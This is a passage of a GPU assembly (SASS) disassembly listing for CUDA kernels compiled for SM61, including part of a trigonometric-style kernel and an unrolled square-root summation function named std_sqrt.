/*0388*/ SHR.U32 R6, R6, R9 ; /* 0x5c28000000970606 */
/*0390*/ @!P2 IADD R12, R8, R6 ; /* 0x5c100000006a080c */
/*0398*/ XMAD R9, R12, R14, RZ ; /* 0x5b007f8000e70c09 */
/* 0x001fd800fc8007e1 */
/*03a8*/ XMAD R6, R12, R14.H1, RZ ; /* 0x5b007f8800e70c06 */
/*03b0*/ XMAD R8, R12.H1, R14.H1, RZ ; /* 0x5b207f8800e70c08 */
/*03b8*/ XMAD.CHI R13, R12.H1, R14, R9 ; /* 0x5b28048000e70c0d */
/* 0x001ff400fda007f6 */
/*03c8*/ IADD3.RS R6, R13, R6, R8 ; /* 0x5cc0042000670d06 */
/*03d0*/ ISETP.GE.AND P2, PT, R6, 0x1, PT ; /* 0x366d038000170617 */
/*03d8*/ @P2 XMAD.MRG R14, R12, R14.H1, RZ ; /* 0x5b007fa800e20c0e */
/* 0x001f8400fcc007f6 */
/*03e8*/ @P2 XMAD.PSL.CBCC R8, R12.H1, R14.H1, R9 ; /* 0x5b30049800e20c08 */
/*03f0*/ @P2 SHF.L R6, R8, 0x1, R6 ; /* 0x36f8030000120806 */
/*03f8*/ IADD32I R6, R6, 0x1 ; /* 0x1c00000000170606 */
/* 0x001fc400fc2007f5 */
/*0408*/ @P2 IADD32I R10, R10, 0x1 ; /* 0x1c00000000120a0a */
/*0410*/ LEA.HI R6, R6, c[0x2][0x10], RZ, 0x19 ; /* 0x18cf7f8800470606 */
/*0418*/ LOP32I.AND R12, R5, 0x80000000 ; /* 0x040800000007050c */
/* 0x001f8400fe6007e1 */
/*0428*/ LEA.HI R7, R0, R7, RZ, 0x2 ; /* 0x5bdf7f8020770007 */
/*0430*/ IADD32I R10, -R10, 0x7e ; /* 0x1d00000007e70a0a */
/*0438*/ SHR.U32 R0, R6, 0x1 ; /* 0x3828000000170600 */
/* 0x001fcc00fc2007e1 */
/*0448*/ @P1 LOP32I.XOR R8, R12, 0x80000000 ; /* 0x0448000000010c08 */
/*0450*/ IADD R5, -R7, RZ ; /* 0x5c1200000ff70705 */
/*0458*/ @!P1 MOV R8, R12 ; /* 0x5c98078000c90008 */
/* 0x001fc000fc8007f2 */
/*0468*/ ISCADD R10, R10, R0, 0x17 ; /* 0x5c180b8000070a0a */
/*0470*/ ICMP.EQ R0, R7, R5, R12 ; /* 0x5b45060000570700 */
/*0478*/ { LOP.OR R8, R10, R8 ; /* 0x5c47020000870a08 */
/* 0x001fc440fe2007fd */
/*0488*/ SYNC }
/* 0xf0f800000007000f */
/*0490*/ LOP32I.AND R5, R0.reuse, 0x1 ; /* 0x0400000000170005 */
/*0498*/ FMUL R7, R8, R8 ; /* 0x5c68000000870807 */
/* 0x001fc400fda007f4 */
/*04a8*/ LOP.AND.NZ P1, RZ, R0, 0x2 ; /* 0x38413000002700ff */
/*04b0*/ ISETP.NE.AND P2, PT, R5, RZ, PT ; /* 0x5b6b03800ff70517 */
/*04b8*/ @P2 MOV32I R5, 0x3ab6061a ; /* 0x0103ab6061a2f005 */
/* 0x001fd400fc2007f5 */
/*04c8*/ @!P2 MOV32I R6, 0x3c08839e ; /* 0x0103c08839eaf006 */
/*04d0*/ @P2 FFMA R5, R7, c[0x2][0x14], -R5 ; /* 0x4982028800520705 */
/*04d8*/ @!P2 FFMA R5, R7, c[0x2][0x18], R6 ; /* 0x49800308006a0705 */
/* 0x001fc400fea007f1 */
/*04e8*/ @P2 FFMA R6, R7, R5, c[0x2][0x1c] ; /* 0x5180028800720706 */
/*04f0*/ @!P2 FFMA R5, R7, R5, c[0x2][0x24] ; /* 0x51800288009a0705 */
/*04f8*/ @P2 FFMA R6, R7, R6, c[0x2][0x20] ; /* 0x5180030800820706 */
/* 0x001ff400fc2007f6 */
/*0508*/ @!P2 FFMA R6, R7, R5, RZ ; /* 0x59807f80005a0706 */
/*0510*/ FFMA R8, R6, R8, R8 ; /* 0x5980040000870608 */
/*0518*/ @P2 FFMA R8, R7, R6, c[0x2][0x28] ; /* 0x5180030800a20708 */
/* 0x001ff400fe0007f6 */
/*0528*/ @P1 FFMA R8, R8, -1, RZ ; /* 0x33807fbf80010808 */
/*0530*/ { FADD R2, R8, R2 ; /* 0x5c58000000270802 */
/*0538*/ @!P0 BRA 0x38 }
/* 0xe2400fffaf88000f */
/* 0x001f8800fcc207f1 */
/*0548*/ SHR R0, R4.reuse, 0x1e ; /* 0x3829000001e70400 */
/*0550*/ ISCADD R4.CC, R4, c[0x0][0x150], 0x2 ; /* 0x4c18810005470404 */
/*0558*/ IADD.X R5, R0, c[0x0][0x154] ; /* 0x4c10080005570005 */
/* 0x001ffc00ffe007f5 */
/*0568*/ STG.E [R4], R2 ; /* 0xeedc200000070402 */
/*0570*/ EXIT ; /* 0xe30000000007000f */
/*0578*/ BRA 0x578 ; /* 0xe2400fffff87000f */
..............................
Function : _Z8std_sqrtPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R4, RZ ; /* 0x5c9807800ff70004 */
/*0018*/ S2R R0, SR_CTAID.X }
/* 0xf0c8000002570000 */
/* 0x085fd841fe20073f */
/*0028*/ S2R R2, SR_TID.X ; /* 0xf0c8000002170002 */
/*0030*/ XMAD.MRG R3, R0.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270003 */
/*0038*/ XMAD R2, R0.reuse, c[0x0] [0x8], R2 ; /* 0x4e00010000270002 */
/* 0x001f9800fea007f1 */
/*0048*/ XMAD.PSL.CBCC R0, R0.H1, R3.H1, R2 ; /* 0x5b30011800370000 */
/*0050*/ MOV32I R2, 0xffffff00 ; /* 0x010ffffff007f002 */
/*0058*/ MOV R3, R0 ; /* 0x5c98078000070003 */
/* 0x001f9800fe2207f0 */
/*0068*/ { SHR.U32 R5, R3.reuse, 0x1e ; /* 0x3828000001e70305 */
/*0070*/ SSY 0x138 }
/* 0xe29000000c000000 */
/*0078*/ ISCADD R6.CC, R3, c[0x0][0x140], 0x2 ; /* 0x4c18810005070306 */
/* 0x001fd800f62007e2 */
/*0088*/ IADD.X R7, R5, c[0x0][0x144] ; /* 0x4c10080005170507 */
/*0090*/ LDG.E R10, [R6] ; /* 0xeed420000007060a */
/*0098*/ IADD32I R2, R2, 0x10 ; /* 0x1c00000001070202 */
/* 0x001fb420fec007ed */
/*00a8*/ ISETP.NE.AND P0, PT, R2, RZ, PT ; /* 0x5b6b03800ff70207 */
/*00b0*/ IADD32I R5, R10, -0xd000000 ; /* 0x1c0f300000070a05 */
/*00b8*/ ISETP.GT.U32.AND P1, PT, R5, c[0x2][0x0], PT ; /* 0x4b6803880007050f */
/* 0x001fc000ffa007fd */
/*00c8*/ @!P1 BRA 0xf0 ; /* 0xe24000000209000f */
/*00d0*/ CAL 0xd78 ; /* 0xe2600000ca000040 */
/*00d8*/ { MOV R5, R6 ; /* 0x5c98078000670005 */
/* 0x003fc400e3a007fd */
/*00e8*/ SYNC }
/* 0xf0f800000007000f */
/*00f0*/ MUFU.RSQ R5, R10 ; /* 0x5080000000570a05 */
/*00f8*/ FMUL.FTZ R6, R10, R5 ; /* 0x5c68100000570a06 */
/* 0x001fd840fec007f5 */
/*0108*/ FMUL.FTZ R5, R5, 0.5 ; /* 0x3868103f00070505 */
/*0110*/ FADD.FTZ R7, -R6.reuse, -RZ ; /* 0x5c5930000ff70607 */
/*0118*/ FFMA R7, R6, R7, R10 ; /* 0x5980050000770607 */
/* 0x001fc000ffa007f0 */
/*0128*/ { FFMA R5, R7, R5, R6 ; /* 0x5980030000570705 */
/*0130*/ SYNC }
/* 0xf0f800000007000f */
/*0138*/ { IADD32I R6, R3, 0x1 ; /* 0x1c00000000170306 */
/* 0x001f9840fe2007f6 */
/*0148*/ SSY 0x200 }
/* 0xe29000000b000000 */
/*0150*/ SHR.U32 R7, R6.reuse, 0x1e ; /* 0x3828000001e70607 */
/*0158*/ ISCADD R6.CC, R6, c[0x0][0x140], 0x2 ; /* 0x4c18810005070606 */
/* 0x001f9000f62007e2 */
/*0168*/ IADD.X R7, R7, c[0x0][0x144] ; /* 0x4c10080005170707 */
/*0170*/ LDG.E R10, [R6] ; /* 0xeed420000007060a */
/*0178*/ FADD R11, R5, R4 ; /* 0x5c5800000047050b */
/* 0x001ff400fda107f6 */
/*0188*/ IADD32I R8, R10, -0xd000000 ; /* 0x1c0f300000070a08 */
/*0190*/ ISETP.GT.U32.AND P1, PT, R8, c[0x2][0x0], PT ; /* 0x4b6803880007080f */
/*0198*/ @!P1 BRA 0x1b8 ; /* 0xe24000000189000f */
/* 0x001c7400ffa007fd */
/*01a8*/ CAL 0xd78 ; /* 0xe2600000bc800040 */
/*01b0*/ SYNC ; /* 0xf0f800000007000f */
/*01b8*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*01c8*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*01d0*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*01d8*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/* 0x001ff400fe0007f6 */
/*01e8*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*01f0*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*01f8*/ SYNC }
/* 0xf0f800000007000f */
/* 0x081fc400fec007f0 */
/*0208*/ { IADD32I R4, R3, 0x2 ; /* 0x1c00000000270304 */
/*0210*/ SSY 0x2d0 }
/* 0xe29000000b800000 */
/*0218*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/* 0x001ec400fc4007e6 */
/*0228*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0230*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0238*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/* 0x001fb420fec007e4 */
/*0248*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0250*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0258*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/* 0x001ff400ffa007fd */
/*0268*/ @!P1 BRA 0x280 ; /* 0xe24000000109000f */
/*0270*/ CAL 0xd78 ; /* 0xe2600000b0000040 */
/*0278*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001fd401fe20071d */
/*0288*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0290*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0298*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/* 0x001fc000fec207f6 */
/*02a8*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*02b0*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*02b8*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/* 0x001fd800fe0007fd */
/*02c8*/ SYNC }
/* 0xf0f800000007000f */
/*02d0*/ { IADD32I R4, R3, 0x3 ; /* 0x1c00000000370304 */
/*02d8*/ SSY 0x398 }
/* 0xe29000000b800000 */
/* 0x001f8800fcc207f1 */
/*02e8*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*02f0*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*02f8*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/* 0x041fd800fc8007b1 */
/*0308*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0310*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0318*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/* 0x001ff400ffa007ed */
/*0328*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0330*/ @!P1 BRA 0x350 ; /* 0xe24000000189000f */
/*0338*/ CAL 0xd78 ; /* 0xe2600000a3800040 */
/* 0x003fc400e3a007fd */
/*0348*/ SYNC ; /* 0xf0f800000007000f */
/*0350*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0358*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/* 0x001fd840fec007f5 */
/*0368*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0370*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0378*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/* 0x001fc000ffa007f0 */
/*0388*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0390*/ SYNC }
/* 0xf0f800000007000f */
/*0398*/ { IADD32I R4, R3, 0x4 ; /* 0x1c00000000470304 */
/* 0x001f9840fe2007f6 */
/*03a8*/ SSY 0x460 }
/* 0xe29000000b000000 */
/*03b0*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*03b8*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/* 0x001f9000f62007e2 */
/*03c8*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*03d0*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*03d8*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/* 0x001ff400fda107f6 */
/*03e8*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*03f0*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*03f8*/ @!P1 BRA 0x418 ; /* 0xe24000000189000f */
/* 0x001c7400ffa007fd */
/*0408*/ CAL 0xd78 ; /* 0xe260000096800040 */
/*0410*/ SYNC ; /* 0xf0f800000007000f */
/*0418*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*0428*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0430*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0438*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/* 0x001ff400fe0007f6 */
/*0448*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0450*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0458*/ SYNC }
/* 0xf0f800000007000f */
/* 0x081fc400fec007f0 */
/*0468*/ { IADD32I R4, R3, 0x5 ; /* 0x1c00000000570304 */
/*0470*/ SSY 0x530 }
/* 0xe29000000b800000 */
/*0478*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/* 0x001ec400fc4007e6 */
/*0488*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0490*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0498*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/* 0x001fb420fec007e4 */
/*04a8*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*04b0*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*04b8*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/* 0x001ff400ffa007fd */
/*04c8*/ @!P1 BRA 0x4e0 ; /* 0xe24000000109000f */
/*04d0*/ CAL 0xd78 ; /* 0xe26000008a000040 */
/*04d8*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001fd401fe20071d */
/*04e8*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*04f0*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*04f8*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/* 0x001fc000fec207f6 */
/*0508*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0510*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0518*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/* 0x001fd800fe0007fd */
/*0528*/ SYNC }
/* 0xf0f800000007000f */
/*0530*/ { IADD32I R4, R3, 0x6 ; /* 0x1c00000000670304 */
/*0538*/ SSY 0x5f8 }
/* 0xe29000000b800000 */
/* 0x001f8800fcc207f1 */
/*0548*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0550*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0558*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/* 0x041fd800fc8007b1 */
/*0568*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0570*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0578*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/* 0x001ff400ffa007ed */
/*0588*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0590*/ @!P1 BRA 0x5b0 ; /* 0xe24000000189000f */
/*0598*/ CAL 0xd78 ; /* 0xe26000007d800040 */
/* 0x003fc400e3a007fd */
/*05a8*/ SYNC ; /* 0xf0f800000007000f */
/*05b0*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*05b8*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/* 0x001fd840fec007f5 */
/*05c8*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*05d0*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*05d8*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/* 0x001fc000ffa007f0 */
/*05e8*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*05f0*/ SYNC }
/* 0xf0f800000007000f */
/*05f8*/ { IADD32I R4, R3, 0x7 ; /* 0x1c00000000770304 */
/* 0x001f9840fe2007f6 */
/*0608*/ SSY 0x6c0 }
/* 0xe29000000b000000 */
/*0610*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0618*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/* 0x001f9000f62007e2 */
/*0628*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0630*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0638*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/* 0x001ff400fda107f6 */
/*0648*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0650*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0658*/ @!P1 BRA 0x678 ; /* 0xe24000000189000f */
/* 0x001c7400ffa007fd */
/*0668*/ CAL 0xd78 ; /* 0xe260000070800040 */
/*0670*/ SYNC ; /* 0xf0f800000007000f */
/*0678*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*0688*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0690*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0698*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/* 0x001ff400fe0007f6 */
/*06a8*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*06b0*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*06b8*/ SYNC }
/* 0xf0f800000007000f */
/* 0x081fc400fec007f0 */
/*06c8*/ { IADD32I R4, R3, 0x8 ; /* 0x1c00000000870304 */
/*06d0*/ SSY 0x790 }
/* 0xe29000000b800000 */
/*06d8*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/* 0x001ec400fc4007e6 */
/*06e8*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*06f0*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*06f8*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/* 0x001fb420fec007e4 */
/*0708*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0710*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0718*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/* 0x001ff400ffa007fd */
/*0728*/ @!P1 BRA 0x740 ; /* 0xe24000000109000f */
/*0730*/ CAL 0xd78 ; /* 0xe260000064000040 */
/*0738*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001fd401fe20071d */
/*0748*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0750*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0758*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/* 0x001fc000fec207f6 */
/*0768*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0770*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0778*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/* 0x001fd800fe0007fd */
/*0788*/ SYNC }
/* 0xf0f800000007000f */
/*0790*/ { IADD32I R4, R3, 0x9 ; /* 0x1c00000000970304 */
/*0798*/ SSY 0x858 }
/* 0xe29000000b800000 */
/* 0x001f8800fcc207f1 */
/*07a8*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*07b0*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*07b8*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/* 0x041fd800fc8007b1 */
/*07c8*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*07d0*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*07d8*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/* 0x001ff400ffa007ed */
/*07e8*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*07f0*/ @!P1 BRA 0x810 ; /* 0xe24000000189000f */
/*07f8*/ CAL 0xd78 ; /* 0xe260000057800040 */
/* 0x003fc400e3a007fd */
/*0808*/ SYNC ; /* 0xf0f800000007000f */
/*0810*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0818*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/* 0x001fd840fec007f5 */
/*0828*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0830*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0838*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/* 0x001fc000ffa007f0 */
/*0848*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0850*/ SYNC }
/* 0xf0f800000007000f */
/*0858*/ { IADD32I R4, R3, 0xa ; /* 0x1c00000000a70304 */
/* 0x001f9840fe2007f6 */
/*0868*/ SSY 0x920 }
/* 0xe29000000b000000 */
/*0870*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0878*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/* 0x001f9000f62007e2 */
/*0888*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0890*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0898*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/* 0x001ff400fda107f6 */
/*08a8*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*08b0*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*08b8*/ @!P1 BRA 0x8d8 ; /* 0xe24000000189000f */
/* 0x001c7400ffa007fd */
/*08c8*/ CAL 0xd78 ; /* 0xe26000004a800040 */
/*08d0*/ SYNC ; /* 0xf0f800000007000f */
/*08d8*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*08e8*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*08f0*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*08f8*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/* 0x001ff400fe0007f6 */
/*0908*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0910*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0918*/ SYNC }
/* 0xf0f800000007000f */
/* 0x081fc400fec007f0 */
/*0928*/ { IADD32I R4, R3, 0xb ; /* 0x1c00000000b70304 */
/*0930*/ SSY 0x9f0 }
/* 0xe29000000b800000 */
/*0938*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/* 0x001ec400fc4007e6 */
/*0948*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0950*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0958*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/* 0x001fb420fec007e4 */
/*0968*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0970*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0978*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/* 0x001ff400ffa007fd */
/*0988*/ @!P1 BRA 0x9a0 ; /* 0xe24000000109000f */
/*0990*/ CAL 0xd78 ; /* 0xe26000003e000040 */
/*0998*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001fd401fe20071d */
/*09a8*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*09b0*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*09b8*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/* 0x001fc000fec207f6 */
/*09c8*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*09d0*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*09d8*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/* 0x001fd800fe0007fd */
/*09e8*/ SYNC }
/* 0xf0f800000007000f */
/*09f0*/ { IADD32I R4, R3, 0xc ; /* 0x1c00000000c70304 */
/*09f8*/ SSY 0xab8 }
/* 0xe29000000b800000 */
/* 0x001f8800fcc207f1 */
/*0a08*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0a10*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0a18*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/* 0x041fd800fc8007b1 */
/*0a28*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0a30*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0a38*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/* 0x001ff400ffa007ed */
/*0a48*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0a50*/ @!P1 BRA 0xa70 ; /* 0xe24000000189000f */
/*0a58*/ CAL 0xd78 ; /* 0xe260000031800040 */
/* 0x003fc400e3a007fd */
/*0a68*/ SYNC ; /* 0xf0f800000007000f */
/*0a70*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0a78*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/* 0x001fd840fec007f5 */
/*0a88*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0a90*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0a98*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/* 0x001fc000ffa007f0 */
/*0aa8*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0ab0*/ SYNC }
/* 0xf0f800000007000f */
/*0ab8*/ { IADD32I R4, R3, 0xd ; /* 0x1c00000000d70304 */
/* 0x001f9840fe2007f6 */
/*0ac8*/ SSY 0xb80 }
/* 0xe29000000b000000 */
/*0ad0*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0ad8*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/* 0x001f9000f62007e2 */
/*0ae8*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0af0*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0af8*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/* 0x001ff400fda107f6 */
/*0b08*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
